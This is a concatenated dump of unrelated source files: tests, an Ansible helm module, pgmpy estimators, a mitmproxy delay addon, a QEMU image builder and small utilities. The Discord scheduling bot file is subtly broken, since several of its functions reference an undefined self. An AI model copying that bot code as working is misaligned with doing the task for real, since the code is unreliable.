#        http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
#    * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#    * See the License for the specific language governing permissions and
#    * limitations under the License.

from os import path

import testtools

from cloudify.decorators import workflow
from cloudify.test_utils import workflow_test


@workflow
def not_exist_op_workflow(ctx, **kwargs):
    for node in ctx.nodes:
        for instance in node.instances:
            instance.execute_operation(
                'cloudify.interfaces.lifecycle.op_not_exist')


@workflow
def not_exist_interface_workflow(ctx, **kwargs):
    for node in ctx.nodes:
        for instance in node.instances:
            instance.execute_operation(
                'cloudify.interfaces.interfaces_not_exist.create')


@workflow
def stop_workflow(ctx, **kwargs):
    for node in ctx.nodes:
        for instance in node.instances:
            instance.execute_operation(
                'cloudify.interfaces.lifecycle.stop')


class TestExecuteNotExistOperationWorkflow(testtools.TestCase):

    execute_blueprint_path = path.join('resources', 'blueprints',
                                       'not_exist_op_workflow-blueprint.yaml')

    @workflow_test(execute_blueprint_path)
    def test_execute_not_exist_operation(self, cfy_local):
        node_id = cfy_local.plan.get('node_instances')[0].get('id')
        try:
            cfy_local.execute('not_exist_op_workflow')
            self.fail('Expected exception due to operation not exist')
        except Exception as e:
            self.assertTrue('operation of node instance {0} does not exist'
                            .format(node_id) in e.message)

    @workflow_test(execute_blueprint_path)
    def test_execute_not_exist_interface(self, cfy_local):
        node_id = cfy_local.plan.get('node_instances')[0].get('id')
        try:
            cfy_local.execute('not_exist_interface_workflow')
            self.fail('Expected exception due to operation not exist')
        except Exception as e:
            self.assertTrue('operation of node instance {0} does not exist'
                            .format(node_id) in e.message)

    @workflow_test(execute_blueprint_path)
    def test_execute_stop_operation(self, cfy_local):
        # checks that an operation that exists in a builtin interface
        # does not raise an exception if it is not declared in the blueprint
        cfy_local.execute('stop_workflow')
1.359375
1
study/sparql/queries/describe.py
arthurTemporim/semantic_web_playground
0
12753451
<reponame>arthurTemporim/semantic_web_playground<gh_stars>0
from SPARQLWrapper import SPARQLWrapper, N3
from rdflib import Graph

sparql = SPARQLWrapper("http://dbpedia.org/sparql")

sparql.setQuery("""
    DESCRIBE <http://dbpedia.org/resource/Asturias>
""")

sparql.setReturnFormat(N3)
results = sparql.query().convert()

g = Graph()
g.parse(data=results, format="n3")
print(g.serialize(format='n3'))
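# Illustrative follow-up (editor's addition, not part of the original
# describe.py): one way to inspect the parsed DESCRIBE result held in `g`.
for subj, pred, obj in list(g)[:10]:  # print the first ten triples
    print(subj, pred, obj)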
1.5
2
Collections-a-installer/community-general-2.4.0/plugins/modules/helm.py
d-amien-b/simple-getwordpress
5
12753579
<filename>Collections-a-installer/community-general-2.4.0/plugins/modules/helm.py #!/usr/bin/python # (c) 2016, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type DOCUMENTATION = ''' --- deprecated: removed_in: 3.0.0 # was Ansible 2.14 why: For more details https://github.com/ansible/ansible/issues/61546. alternative: Use M(community.kubernetes.helm) instead. module: helm short_description: Manages Kubernetes packages with the Helm package manager author: "<NAME> (@flaper87)" description: - Install, upgrade, delete and list packages with the Helm package manager. requirements: - "pyhelm" - "grpcio" options: host: description: - Tiller's server host. type: str default: "localhost" port: description: - Tiller's server port. type: int default: 44134 namespace: description: - Kubernetes namespace where the chart should be installed. type: str default: "default" name: description: - Release name to manage. type: str state: description: - Whether to install C(present), remove C(absent), or purge C(purged) a package. choices: ['absent', 'purged', 'present'] type: str default: "present" chart: description: - A map describing the chart to install. See examples for available options. type: dict default: {} values: description: - A map of value options for the chart. type: dict default: {} disable_hooks: description: - Whether to disable hooks during the uninstall process. type: bool default: 'no' ''' RETURN = ''' # ''' EXAMPLES = ''' - name: Install helm chart community.general.helm: host: localhost chart: name: memcached version: 0.4.0 source: type: repo location: https://kubernetes-charts.storage.googleapis.com state: present name: my-memcached namespace: default - name: Uninstall helm chart community.general.helm: host: localhost state: absent name: my-memcached - name: Install helm chart from a git repo community.general.helm: host: localhost chart: source: type: git location: https://github.com/user/helm-chart.git state: present name: my-example namespace: default values: foo: "bar" - name: Install helm chart from a git repo specifying path community.general.helm: host: localhost chart: source: type: git location: https://github.com/helm/charts.git path: stable/memcached state: present name: my-memcached namespace: default values: "{{ lookup('file', '/path/to/file/values.yaml') | from_yaml }}" ''' import traceback HELM_IMPORT_ERR = None try: import grpc from pyhelm import tiller from pyhelm import chartbuilder except ImportError: HELM_IMPORT_ERR = traceback.format_exc() from ansible.module_utils.basic import AnsibleModule, missing_required_lib def install(module, tserver): changed = False params = module.params name = params['name'] values = params['values'] chart = module.params['chart'] namespace = module.params['namespace'] chartb = chartbuilder.ChartBuilder(chart) r_matches = (x for x in tserver.list_releases() if x.name == name and x.namespace == namespace) installed_release = next(r_matches, None) if installed_release: if installed_release.chart.metadata.version != chart['version']: tserver.update_release(chartb.get_helm_chart(), False, namespace, name=name, values=values) changed = True else: tserver.install_release(chartb.get_helm_chart(), namespace, dry_run=False, name=name, values=values) changed = True return dict(changed=changed) def delete(module, tserver, purge=False): changed = False params = module.params if not module.params['name']: 
module.fail_json(msg='Missing required field name') name = module.params['name'] disable_hooks = params['disable_hooks'] try: tserver.uninstall_release(name, disable_hooks, purge) changed = True except grpc._channel._Rendezvous as exc: if 'not found' not in str(exc): raise exc return dict(changed=changed) def main(): """The main function.""" module = AnsibleModule( argument_spec=dict( host=dict(type='str', default='localhost'), port=dict(type='int', default=44134), name=dict(type='str', default=''), chart=dict(type='dict'), state=dict( choices=['absent', 'purged', 'present'], default='present' ), # Install options values=dict(type='dict'), namespace=dict(type='str', default='default'), # Uninstall options disable_hooks=dict(type='bool', default=False), ), supports_check_mode=True) if HELM_IMPORT_ERR: module.fail_json(msg=missing_required_lib('pyhelm'), exception=HELM_IMPORT_ERR) host = module.params['host'] port = module.params['port'] state = module.params['state'] tserver = tiller.Tiller(host, port) if state == 'present': rst = install(module, tserver) if state in 'absent': rst = delete(module, tserver) if state in 'purged': rst = delete(module, tserver, True) module.exit_json(**rst) if __name__ == '__main__': main()
1.070313
1
tests/unit/test_dataset.py
victorbadenas/frarch
0
12753707
<filename>tests/unit/test_dataset.py import shutil import unittest from pathlib import Path import torch from frarch import datasets from frarch.utils.exceptions import DatasetNotFoundError DATA_FOLDER = Path(__file__).resolve().parent.parent / "data" class TestCaltech101(unittest.TestCase): MOCK_DATASET_ROOT = DATA_FOLDER / "caltech101" trainlst_path = MOCK_DATASET_ROOT / "train.lst" validlst_path = MOCK_DATASET_ROOT / "valid.lst" classjson_path = MOCK_DATASET_ROOT / "classes.json" classes = (DATA_FOLDER / "caltech101_classes.txt").read_text().split(",") @classmethod def setUpClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) for c in cls.classes: (cls.MOCK_DATASET_ROOT / c).mkdir(parents=True, exist_ok=True) for i in range(10): (cls.MOCK_DATASET_ROOT / c / f"{i}.jpg").touch() @classmethod def tearDownClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) def tearDown(self): if self.trainlst_path.exists(): self.trainlst_path.unlink() if self.validlst_path.exists(): self.validlst_path.unlink() if self.classjson_path.exists(): self.classjson_path.unlink() return super().tearDown() def test_build_caltech101_train(self): dataset = datasets.Caltech101("train", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 101) self.assertEquals(len(dataset.images), 909) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_build_caltech101_valid(self): dataset = datasets.Caltech101("valid", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 101) self.assertEquals(len(dataset.images), 101) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_caltech101_not_valid_subset(self): with self.assertRaises(ValueError): datasets.Caltech101("nope", root=self.MOCK_DATASET_ROOT) def test_caltech101_path_no_files(self): with self.assertRaises(DatasetNotFoundError): datasets.Caltech101("train", root="./nope/") def test_caltech101_get_length(self): dataset = datasets.Caltech101("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(len(dataset), 101) def test_caltech101_get_num_classes(self): dataset = datasets.Caltech101("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(dataset.get_number_classes(), 101) class TestMit67(unittest.TestCase): MOCK_DATASET_ROOT = DATA_FOLDER / "mit67" trainlst_path = MOCK_DATASET_ROOT / "train.lst" validlst_path = MOCK_DATASET_ROOT / "valid.lst" classjson_path = MOCK_DATASET_ROOT / "class_map.json" classes = (DATA_FOLDER / "mit67_classes.txt").read_text().split(",") @classmethod def setUpClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) for c in cls.classes: (cls.MOCK_DATASET_ROOT / "Images" / c).mkdir(parents=True, exist_ok=True) for i in range(10): (cls.MOCK_DATASET_ROOT / "Images" / c / f"{i}.jpg").touch() 
@classmethod def tearDownClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) def tearDown(self): if self.trainlst_path.exists(): self.trainlst_path.unlink() if self.validlst_path.exists(): self.validlst_path.unlink() if self.classjson_path.exists(): self.classjson_path.unlink() return super().tearDown() def test_build_mit67_train(self): dataset = datasets.Mit67(True, root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 67) self.assertEquals(len(dataset.images), 603) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_build_mit67_valid(self): dataset = datasets.Mit67(False, root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 67) self.assertEquals(len(dataset.images), 67) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_mit67_path_no_files(self): with self.assertRaises(DatasetNotFoundError): datasets.Mit67(True, root="./nope/", download=False) def test_caltech101_get_length(self): dataset = datasets.Mit67(False, root=self.MOCK_DATASET_ROOT) self.assertEqual(len(dataset), 67) def test_caltech101_get_num_classes(self): dataset = datasets.Mit67(False, root=self.MOCK_DATASET_ROOT) self.assertEqual(dataset.get_number_classes(), 67) class TestOxfordPets(unittest.TestCase): MOCK_DATASET_ROOT = DATA_FOLDER / "oxfordpets" trainlst_path = MOCK_DATASET_ROOT / "annotations" / "trainval.txt" validlst_path = MOCK_DATASET_ROOT / "annotations" / "test.txt" @classmethod def setUpClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) cls.MOCK_DATASET_ROOT.mkdir(exist_ok=True, parents=True) (cls.MOCK_DATASET_ROOT / "images").mkdir(exist_ok=True, parents=True) shutil.copytree( str(DATA_FOLDER / "oxford_pets_lst"), str(cls.trainlst_path.parent) ) with open(DATA_FOLDER / "oxford_pets_lst" / "trainval.txt") as f: for line in f: fname = line.split(" ")[0] (cls.MOCK_DATASET_ROOT / "images" / f"{fname}.jpg").touch() @classmethod def tearDownClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) def test_build_OxfordPets_train(self): dataset = datasets.OxfordPets("train", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, set) self.assertEquals(len(dataset.classes), 37) self.assertEquals(len(dataset.images), 3680) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) def test_build_OxfordPets_valid(self): dataset = datasets.OxfordPets("valid", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, set) self.assertEquals(len(dataset.classes), 37) 
self.assertEquals(len(dataset.images), 3669) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) def test_OxfordPets_path_no_files(self): with self.assertRaises(DatasetNotFoundError): datasets.OxfordPets("valid", root="./nope/", download=False) def test_OxfordPets_not_valid_subset(self): with self.assertRaises(ValueError): datasets.OxfordPets("nope", root=self.MOCK_DATASET_ROOT, download=False) def test_OxfordPets_get_length(self): dataset = datasets.OxfordPets("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(len(dataset), 3669) def test_OxfordPets_get_num_classes(self): dataset = datasets.OxfordPets("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(dataset.get_number_classes(), 37) if __name__ == "__main__": unittest.main()
1.648438
2
experiments-xml/prettyprint.py
CherryKitty/PROTON-OC
3
12753835
#pretty print method
def indent(elem, level=0):
    i = "\n" + level*" "
    j = "\n" + (level-1)*" "
    if len(elem):
        if not elem.text or not elem.text.strip():
            elem.text = i + " "
        if not elem.tail or not elem.tail.strip():
            elem.tail = i
        for subelem in elem:
            indent(subelem, level+1)
        if not elem.tail or not elem.tail.strip():
            elem.tail = j
    else:
        if level and (not elem.tail or not elem.tail.strip()):
            elem.tail = j
    return elem
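# Illustrative usage sketch (editor's addition, not part of the original
# experiments-xml/prettyprint.py). It assumes a file named "experiment.xml"
# exists in the working directory.
if __name__ == "__main__":
    import xml.etree.ElementTree as ET

    tree = ET.parse("experiment.xml")        # load any XML document
    indent(tree.getroot())                   # rewrite text/tail whitespace in place
    tree.write("experiment_pretty.xml")      # save the re-indented copy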
2.125
2
src/schedulebot.py
dcutting133/schedule-bot
0
12753963
<reponame>dcutting133/schedule-bot
import os
import discord
from discord.ext import commands
import config
from admins import admin_list


class ScheduleBot():
    def __init__(self, client, admins):
        self.config = config
        self.admins = admins
        self.client = client
        self.on_ready = self.client.event(self.on_ready)

    def start_bot(self):
        self.client.run(config.bot_token)

    def load_cogs(self):
        for filename in os.listdir('./cogs'):
            if filename.endswith('.py'):
                print("Loaded Cog: ", f'cogs.{filename[:-3]}')
                self.client.load_extension(f'cogs.{filename[:-3]}')

    #admin only bool function
    def is_admin(ctx):
        is_admin = False
        for admin in self.admins:
            if ctx.message.author.id == admin:
                is_admin = True
        return is_admin

    #ready prompt
    async def on_ready(self):
        print("Scheduler Bot is ready.")
        print("Logged in as: ", self.client.user)
        print("ID: ", self.client.user.id)

    #load commands
    @commands.command()
    @commands.check(is_admin)
    async def load(ctx, extension):
        self.client.load_extension(f'cogs.{extension}')

    #unload commands
    @commands.command()
    @commands.check(is_admin)
    async def unload(ctx, extension):
        self.client.unload_extension(f'cogs.{extension}')

    #reload commands
    @commands.command()
    @commands.check(is_admin)
    async def reload(ctx, extension):
        self.client.unload_extension(f'cogs.{extension}')
        self.client.load_extension(f'cogs.{extension}')


def main():
    client = commands.Bot(command_prefix = config.command_prefix)
    bot = ScheduleBot(client, admin_list)
    bot.load_cogs() # load cogs before starting the bot
    bot.start_bot()


if __name__ == '__main__':
    main()
1.734375
2
pgmpy/estimators/base.py
akleinau/pgmpy
2,144
12754091
#!/usr/bin/env python from functools import lru_cache import pandas as pd from pgmpy.utils.decorators import convert_args_tuple class BaseEstimator(object): def __init__(self, data=None, state_names=None, complete_samples_only=True): """ Base class for estimators in pgmpy; `ParameterEstimator`, `StructureEstimator` and `StructureScore` derive from this class. Parameters ---------- data: pandas DataFrame object datafame object where each column represents one variable. (If some values in the data are missing the data cells should be set to `numpy.NaN`. Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.) state_names: dict (optional) A dict indicating, for each variable, the discrete set of states (or values) that the variable can take. If unspecified, the observed values in the data set are taken to be the only possible states. complete_samples_only: bool (optional, default `True`) Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.Nan` somewhere are ignored. If `False` then, for each variable, every row where neither the variable nor its parents are `np.NaN` is used. This sets the behavior of the `state_count`-method. """ self.data = data # data can be None in the case when learning structre from # independence conditions. Look into PC.py. if self.data is not None: self.complete_samples_only = complete_samples_only self.variables = list(data.columns.values) if not isinstance(state_names, dict): self.state_names = { var: self._collect_state_names(var) for var in self.variables } else: self.state_names = dict() for var in self.variables: if var in state_names: if not set(self._collect_state_names(var)) <= set( state_names[var] ): raise ValueError( f"Data contains unexpected states for variable: {var}." ) self.state_names[var] = state_names[var] else: self.state_names[var] = self._collect_state_names(var) def _collect_state_names(self, variable): "Return a list of states that the variable takes in the data." states = sorted(list(self.data.loc[:, variable].dropna().unique())) return states @convert_args_tuple @lru_cache(maxsize=2048) def state_counts( self, variable, parents=[], complete_samples_only=None, weighted=False ): """ Return counts how often each state of 'variable' occurred in the data. If a list of parents is provided, counting is done conditionally for each state configuration of the parents. Parameters ---------- variable: string Name of the variable for which the state count is to be done. parents: list Optional list of variable parents, if conditional counting is desired. Order of parents in list is reflected in the returned DataFrame complete_samples_only: bool Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.NaN` somewhere are ignored. If `False` then every row where neither the variable nor its parents are `np.NaN` is used. Desired default behavior can be passed to the class constructor. weighted: bool If True, data must have a `_weight` column specifying the weight of the datapoint (row). If False, each datapoint has a weight of `1`. 
Returns ------- state_counts: pandas.DataFrame Table with state counts for 'variable' Examples -------- >>> import pandas as pd >>> from pgmpy.estimators import BaseEstimator >>> data = pd.DataFrame(data={'A': ['a1', 'a1', 'a2'], 'B': ['b1', 'b2', 'b1'], 'C': ['c1', 'c1', 'c2']}) >>> estimator = BaseEstimator(data) >>> estimator.state_counts('A') A a1 2 a2 1 >>> estimator.state_counts('C', parents=['A', 'B']) A a1 a2 B b1 b2 b1 b2 C c1 1 1 0 0 c2 0 0 1 0 >>> estimator.state_counts('C', parents=['A']) A a1 a2 C c1 2.0 0.0 c2 0.0 1.0 """ parents = list(parents) # default for how to deal with missing data can be set in class constructor if complete_samples_only is None: complete_samples_only = self.complete_samples_only # ignores either any row containing NaN, or only those where the variable or its parents is NaN data = ( self.data.dropna() if complete_samples_only else self.data.dropna(subset=[variable] + parents) ) if weighted and ("_weight" not in self.data.columns): raise ValueError("data must contain a `_weight` column if weighted=True") if not parents: # count how often each state of 'variable' occured if weighted: state_count_data = data.groupby([variable]).sum()["_weight"] else: state_count_data = data.loc[:, variable].value_counts() state_counts = ( state_count_data.reindex(self.state_names[variable]) .fillna(0) .to_frame() ) else: parents_states = [self.state_names[parent] for parent in parents] # count how often each state of 'variable' occured, conditional on parents' states if weighted: state_count_data = ( data.groupby([variable] + parents).sum()["_weight"].unstack(parents) ) else: state_count_data = ( data.groupby([variable] + parents).size().unstack(parents) ) if not isinstance(state_count_data.columns, pd.MultiIndex): state_count_data.columns = pd.MultiIndex.from_arrays( [state_count_data.columns] ) # reindex rows & columns to sort them and to add missing ones # missing row = some state of 'variable' did not occur in data # missing column = some state configuration of current 'variable's parents # did not occur in data row_index = self.state_names[variable] column_index = pd.MultiIndex.from_product(parents_states, names=parents) state_counts = state_count_data.reindex( index=row_index, columns=column_index ).fillna(0) return state_counts class ParameterEstimator(BaseEstimator): def __init__(self, model, data, **kwargs): """ Base class for parameter estimators in pgmpy. Parameters ---------- model: pgmpy.models.BayesianNetwork or pgmpy.models.MarkovNetwork or pgmpy.models.NoisyOrModel model for which parameter estimation is to be done. data: pandas DataFrame object datafame object with column names identical to the variable names of the model. (If some values in the data are missing the data cells should be set to `numpy.NaN`. Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.) state_names: dict (optional) A dict indicating, for each variable, the discrete set of states (or values) that the variable can take. If unspecified, the observed values in the data set are taken to be the only possible states. complete_samples_only: bool (optional, default `True`) Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.Nan` somewhere are ignored. If `False` then, for each variable, every row where neither the variable nor its parents are `np.NaN` is used. This sets the behavior of the `state_count`-method. 
""" if not (set(model.nodes()) - model.latents) <= set(data.columns.values): raise ValueError( "variable names of the model must be identical to column names in data" ) self.model = model super(ParameterEstimator, self).__init__(data, **kwargs) def state_counts(self, variable, weighted=False, **kwargs): """ Return counts how often each state of 'variable' occurred in the data. If the variable has parents, counting is done conditionally for each state configuration of the parents. Parameters ---------- variable: string Name of the variable for which the state count is to be done. complete_samples_only: bool Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.NaN` somewhere are ignored. If `False` then every row where neither the variable nor its parents are `np.NaN` is used. Desired default behavior can be passed to the class constructor. Returns ------- state_counts: pandas.DataFrame Table with state counts for 'variable' Examples -------- >>> import pandas as pd >>> from pgmpy.models import BayesianNetwork >>> from pgmpy.estimators import ParameterEstimator >>> model = BayesianNetwork([('A', 'C'), ('B', 'C')]) >>> data = pd.DataFrame(data={'A': ['a1', 'a1', 'a2'], 'B': ['b1', 'b2', 'b1'], 'C': ['c1', 'c1', 'c2']}) >>> estimator = ParameterEstimator(model, data) >>> estimator.state_counts('A') A a1 2 a2 1 >>> estimator.state_counts('C') A a1 a2 B b1 b2 b1 b2 C c1 1 1 0 0 c2 0 0 1 0 """ parents = sorted(self.model.get_parents(variable)) return super(ParameterEstimator, self).state_counts( variable, parents=parents, weighted=weighted, **kwargs ) class StructureEstimator(BaseEstimator): def __init__(self, data=None, independencies=None, **kwargs): """ Base class for structure estimators in pgmpy. Parameters ---------- data: pandas DataFrame object datafame object where each column represents one variable. (If some values in the data are missing the data cells should be set to `numpy.NaN`. Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.) state_names: dict (optional) A dict indicating, for each variable, the discrete set of states (or values) that the variable can take. If unspecified, the observed values in the data set are taken to be the only possible states. complete_samples_only: bool (optional, default `True`) Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.Nan` somewhere are ignored. If `False` then, for each variable, every row where neither the variable nor its parents are `np.NaN` is used. This sets the behavior of the `state_count`-method. """ self.independencies = independencies if self.independencies is not None: self.variables = self.independencies.get_all_variables() super(StructureEstimator, self).__init__(data=data, **kwargs) def estimate(self): pass
2.421875
2
gensim2/punctuation_sub.py
arfu2016/DuReader
0
12754219
""" @Project : DuReader @Module : punctuation_sub.py @Author : Deco [<EMAIL>] @Created : 5/16/18 1:36 PM @Desc : """ import string import re def clean_sentence(st): intab = string.punctuation + '。,“”‘’():;?·—《》、' outtab = ' ' table = str.maketrans(dict.fromkeys(intab, outtab)) st1 = st.translate(table) return st1 def clean_sentence2(st): """ 数据预处理 :param st: string :return: string """ in_tab = r'''[{}]''' out_tab = ' ' # out_tab = 'p' clean = re.sub(in_tab, out_tab, st) return clean def clean_sentence3(st): """ 数据预处理 :param st: string :return: string """ in_tab = '[' + string.punctuation + '。,“”‘’():;?·—《》、' + ']' out_tab = '' clean = re.sub(in_tab, out_tab, st) return clean def clean_sentence4(st): """ 数据预处理 :param st: string :return: string """ in_tab = string.punctuation + '。,“”‘’():;?·—《》、' clean = ''.join([c for c in st if c not in in_tab]) # string search, time complexity m*O(n) return clean def clean_sentence5(st): """ 数据预处理 :param st: string :return: string """ in_tab = string.punctuation + '。,“”‘’():;?·—《》、' pt = set(p for p in in_tab) clean = ''.join([c for c in st if c not in pt]) # hash search, time complexity m*O(1) return clean if __name__ == "__main__": print(string.punctuation) print(clean_sentence4('The period will be removed.')) print(clean_sentence5('The period will be removed.'))
2.609375
3
sleeper.py
580/mitmproxy-addons
5
12754347
import time from typing import Optional from mitmproxy import ctx from mitmproxy import flowfilter from mitmproxy.script import concurrent from mitmproxy.exceptions import OptionsError matchall = flowfilter.parse(".") class Sleeper: def __init__(self): self.filter: Optional[flowfilter.TFilter] = matchall def load(self, loader): loader.add_option( "sleep", Optional[int], None, "Delay client requests (milliseconds)", ) loader.add_option( "sleep_filter", Optional[str], None, "Apply delay to flows which match the filter" ) def configure(self, updates): if "sleep" in updates: sleep = ctx.options.sleep if sleep and sleep < 0: raise OptionsError("'sleep' must be >= 0") if "sleep_filter" in updates: filt_str = ctx.options.sleep_filter filt = matchall if not filt_str else flowfilter.parse(filt_str) if not filt: raise OptionsError("Invalid filter expression: %s" % filt_str) self.filter = filt @concurrent def request(self, flow): delay = ctx.options.sleep if delay and delay > 0 and flowfilter.match(self.filter, flow): time.sleep(delay / 1000) addons = [ Sleeper() ]
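
# Hedged usage note (added for illustration, not part of the original addon):
# the script is normally loaded by mitmproxy/mitmdump, and the options it
# registers can then be set on the command line, e.g.
#   mitmdump -s sleeper.py --set sleep=250 --set sleep_filter='~d example.com'
# where the 250 ms delay and the '~d example.com' filter expression are
# arbitrary examples.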
1.554688
2
pytest-embedded-qemu/pytest_embedded_qemu/app.py
Ouss4/pytest-embedded
0
12754475
import os from typing import Optional from pytest_embedded.log import PexpectProcess, cls_redirect_stdout, live_print_call from pytest_embedded_idf.app import IdfApp from . import DEFAULT_IMAGE_FN class IdfFlashImageMaker: """ Create a single image for qemu based on the `IdfApp`'s partition table and all the flash files. """ def __init__(self, app: IdfApp, image_path: str): """ Args: app: `IdfApp` instance image_path: output image path """ self.app = app self.image_path = image_path def make_bin(self) -> None: """ Create a single image file for qemu. """ # flash files is sorted, if the first offset is not 0x0, we need to fill in with empty bin if self.app.flash_files[0][0] != 0x0: self._write_empty_bin(count=self.app.flash_files[0][0]) for offset, file_path, encrypted in self.app.flash_files: if encrypted: raise NotImplementedError('will implement later') else: self._write_bin(file_path, seek=offset) def _write_empty_bin(self, count: int, bs: int = 1024, seek: int = 0): live_print_call( f'dd if=/dev/zero bs={bs} count={count} seek={seek} of={self.image_path}', shell=True, ) def _write_bin(self, binary_filepath, bs: int = 1, seek: int = 0): live_print_call( f'dd if={binary_filepath} bs={bs} seek={seek} of={self.image_path} conv=notrunc', shell=True, ) def _write_encrypted_bin(self, binary_filepath, bs: int = 1, seek: int = 0): live_print_call( f'dd if=/dev/zero bs=1 count=32 of=key.bin', shell=True, ) # generate a fake key bin live_print_call( f'espsecure.py encrypt_flash_data --keyfile key.bin --output decrypted.bin --address {seek} ' f'{binary_filepath}', shell=True, ) self._write_bin('decrypted.bin', bs=bs, seek=seek) def _burn_efuse(self): pass class QemuApp(IdfApp): """ QEMU App class Attributes: pexpect_proc (PexpectProcess): pexpect process image_path (str): QEMU flash-able bin path """ def __init__( self, pexpect_proc: PexpectProcess, app_path: Optional[str] = None, build_dir: Optional[str] = None, part_tool: Optional[str] = None, qemu_image_path: Optional[str] = None, **kwargs, ): """ Args: pexpect_proc: pexpect process app_path: App path build_dir: Build directory part_tool: Partition tool path qemu_image_path: QEMU flashable bin path """ super().__init__(app_path, build_dir=build_dir, part_tool=part_tool, **kwargs) self.pexpect_proc = pexpect_proc self.image_path = qemu_image_path or os.path.join(self.app_path, DEFAULT_IMAGE_FN) if self.target != 'esp32': raise ValueError('For now on QEMU we only support ESP32') self.create_image() @cls_redirect_stdout(source='create image') def create_image(self) -> None: """ Create the image if not exists """ if os.path.exists(self.image_path): print(f'Using image already exists: {self.image_path}') else: image_maker = IdfFlashImageMaker(self, self.image_path) image_maker.make_bin()
1.671875
2
xperiment.py
jluini/julo-doc
0
12754603
<filename>xperiment.py from julodoc.tree.julotree import t, JuloTree from julopedia.models import Author, Node from django.utils import timezone import pypandoc from pandocfilters import applyJSONFilters, Str import json def xper(): authors = Author.objects.all() if not len(authors): print("No hay autores") return author = authors[0] node = Node( node_type = 1, title = "Título", content = "# Heading\n\nEste es un párrafo.\n\n# Otro heading\n\nOtro párrafo.\n", author = author, modification_date = timezone, parent = None ) print("Node created") print(node) print(" OK") tree = t.fromMarkdown(node.content) print(tree.json) print("------------------") print(tree.toHtml()) def toCaps(key, value, format, meta): if key == 'Str': return Str(value.upper()) jsonText = applyJSONFilters([toCaps], tree.json, "") class Obj: def __init__(self, str): self.str = str def read(self): return self.str obj = Obj(jsonText) jsonTree = json.load(obj) return jsonTree def nodeToHtml(node): markdown = node.content #ret = pypandoc.convert_text(article.article_body, 'html', format='markdown+tex_math_double_backslash', extra_args=['--mathjax']) ret = pypandoc.convert_text(markdown, 'html', format='markdown', extra_args=['--mathjax']) return ret
1.640625
2
backend/common/migrations/0004_add_contributors_through.py
bwhicks/PlinyProject
0
12754731
